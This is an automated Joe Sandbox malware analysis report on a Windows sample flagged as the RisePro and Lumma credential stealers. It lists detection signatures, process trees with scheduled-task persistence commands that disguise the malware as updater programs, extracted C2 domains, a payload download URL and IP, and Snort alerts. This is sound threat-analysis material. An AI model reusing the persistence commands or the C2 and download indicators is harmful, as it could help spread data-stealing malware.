Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tMO4FVIc9l.exe

Overview

General Information

Sample name:tMO4FVIc9l.exe
renamed because original name is a hash value
Original sample name:6bc7f3c7927f5fc13a4410f1770c2dfe.exe
Analysis ID:1446871
MD5:6bc7f3c7927f5fc13a4410f1770c2dfe
SHA1:4fd9306a40681e1f881168644f991c30824b02cc
SHA256:c6ec11a31d4c28480f4ee3cc744792e12d7919cfffff5b7ca86649c904b7abda
Tags:exeRiseProStealer
Infos:

Detection

LummaC, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Yara detected RisePro Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • tMO4FVIc9l.exe (PID: 3108 cmdline: "C:\Users\user\Desktop\tMO4FVIc9l.exe" MD5: 6BC7F3C7927F5FC13A4410F1770C2DFE)
    • schtasks.exe (PID: 2012 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5832 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xq6J5KlULX6jlR3rET0T.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
      • RegAsm.exe (PID: 6472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • WerFault.exe (PID: 1132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • MSIUpdaterV202.exe (PID: 5044 cmdline: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
    • RegAsm.exe (PID: 500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • MSIUpdaterV202.exe (PID: 5012 cmdline: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
    • RegAsm.exe (PID: 4340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
  • AdobeUpdaterV202.exe (PID: 6888 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
    • RegAsm.exe (PID: 5920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • AdobeUpdaterV202.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
  • AdobeUpdaterV202.exe (PID: 2852 cmdline: "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe" MD5: F14B083F53FEFD0071732BF5C0DCD6FA)
    • RegAsm.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "employhabragaomlsp.shop"], "Build id": "H8NgCl--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
          00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
            00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: tMO4FVIc9l.exe PID: 3108JoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
                Process Memory Space: tMO4FVIc9l.exe PID: 3108JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 9 entries
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\tMO4FVIc9l.exe, ProcessId: 3108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7
                  Timestamp:05/24/24-00:22:10.983112
                  SID:2052775
                  Source Port:49732
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:20.530627
                  SID:2052775
                  Source Port:49745
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:23.772643
                  SID:2052775
                  Source Port:49751
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:22.518638
                  SID:2052775
                  Source Port:49747
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:12.085167
                  SID:2052775
                  Source Port:49734
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:05.782799
                  SID:2052775
                  Source Port:49721
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:15.606325
                  SID:2052775
                  Source Port:49740
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:14.912811
                  SID:2052775
                  Source Port:49739
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:27.200612
                  SID:2052775
                  Source Port:49753
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:21:54.577369
                  SID:2049060
                  Source Port:49710
                  Destination Port:50500
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:09.677486
                  SID:2052775
                  Source Port:49726
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:13.704960
                  SID:2052775
                  Source Port:49736
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:04.255674
                  SID:2052775
                  Source Port:49717
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:28.906409
                  SID:2052775
                  Source Port:49755
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:16.187312
                  SID:2052775
                  Source Port:49742
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:03.520068
                  SID:2052775
                  Source Port:49715
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:01.482311
                  SID:2046269
                  Source Port:49710
                  Destination Port:50500
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:21:55.315556
                  SID:2046267
                  Source Port:50500
                  Destination Port:49710
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:21:55.095747
                  SID:2046266
                  Source Port:50500
                  Destination Port:49710
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:06.685867
                  SID:2052775
                  Source Port:49723
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:23.759277
                  SID:2052775
                  Source Port:49750
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:17.527410
                  SID:2052775
                  Source Port:49744
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:32.208689
                  SID:2052775
                  Source Port:49757
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:03.499118
                  SID:2052761
                  Source Port:65237
                  Destination Port:53
                  Protocol:UDP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:05.249068
                  SID:2052775
                  Source Port:49720
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:25.432173
                  SID:2052775
                  Source Port:49752
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:14.645862
                  SID:2052775
                  Source Port:49738
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:05.172883
                  SID:2052775
                  Source Port:49719
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:21.615908
                  SID:2052775
                  Source Port:49746
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:15.797814
                  SID:2052775
                  Source Port:49741
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:04.759337
                  SID:2052775
                  Source Port:49718
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:14.452009
                  SID:2052775
                  Source Port:49737
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:06.291359
                  SID:2052775
                  Source Port:49722
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:27.489896
                  SID:2052775
                  Source Port:49754
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:09.774730
                  SID:2052775
                  Source Port:49729
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:06.824727
                  SID:2052775
                  Source Port:49724
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:22.849766
                  SID:2052775
                  Source Port:49748
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:30.450870
                  SID:2052775
                  Source Port:49756
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:04.185732
                  SID:2052775
                  Source Port:49716
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/24/24-00:22:17.199190
                  SID:2052775
                  Source Port:49743
                  Destination Port:443
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://5.42.65.116/lumma2305.exejAvira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exe~Avira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exeMeleonCHAvira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exeaTTmAvira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exeEWPzAvira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exeAvira URL Cloud: Label: phishing
                  Source: http://5.42.65.116/lumma2305.exeto.deAvira URL Cloud: Label: phishing
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeAvira: detection malicious, Label: HEUR/AGEN.1317026
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeAvira: detection malicious, Label: HEUR/AGEN.1317026
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeAvira: detection malicious, Label: HEUR/AGEN.1317026
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exeAvira: detection malicious, Label: HEUR/AGEN.1317026
                  Source: 9.2.MSIUpdaterV202.exe.bf0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["roomabolishsnifftwk.shop", "civilianurinedtsraov.shop", "stalfbaclcalorieeis.shop", "employhabragaomlsp.shop", "femininiespywageg.shop", "averageaattractiionsl.shop", "buttockdecarderwiso.shop", "museumtespaceorsp.shop", "employhabragaomlsp.shop"], "Build id": "H8NgCl--"}
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeReversingLabs: Detection: 44%
                  Source: tMO4FVIc9l.exeReversingLabs: Detection: 42%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeJoe Sandbox ML: detected
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exeJoe Sandbox ML: detected
                  Source: tMO4FVIc9l.exeJoe Sandbox ML: detected
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: roomabolishsnifftwk.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: civilianurinedtsraov.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: stalfbaclcalorieeis.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: employhabragaomlsp.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: femininiespywageg.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: averageaattractiionsl.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: buttockdecarderwiso.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: museumtespaceorsp.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: employhabragaomlsp.shop
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Screen Resoluton:
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: - Physical Installed Memory:
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: Workgroup: -
                  Source: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpString decryptor: H8NgCl--
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00414F19 CryptUnprotectData,12_2_00414F19
                  Source: tMO4FVIc9l.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49757 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F4253 FindFirstFileExW,7_2_004F4253
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00C04253 FindFirstFileExW,9_2_00C04253
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00EA4253 FindFirstFileExW,17_2_00EA4253
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00EA4253 FindFirstFileExW,20_2_00EA4253

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49710 -> 5.42.65.116:50500
                  Source: TrafficSnort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.65.116:50500 -> 192.168.2.6:49710
                  Source: TrafficSnort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.65.116:50500 -> 192.168.2.6:49710
                  Source: TrafficSnort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49710 -> 5.42.65.116:50500
                  Source: TrafficSnort IDS: 2052761 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (employhabragaomlsp .shop) 192.168.2.6:65237 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49715 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49716 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49717 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49718 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49719 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49720 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49721 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49722 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49723 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49724 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49726 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49729 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49732 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49734 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49736 -> 188.114.96.3:443
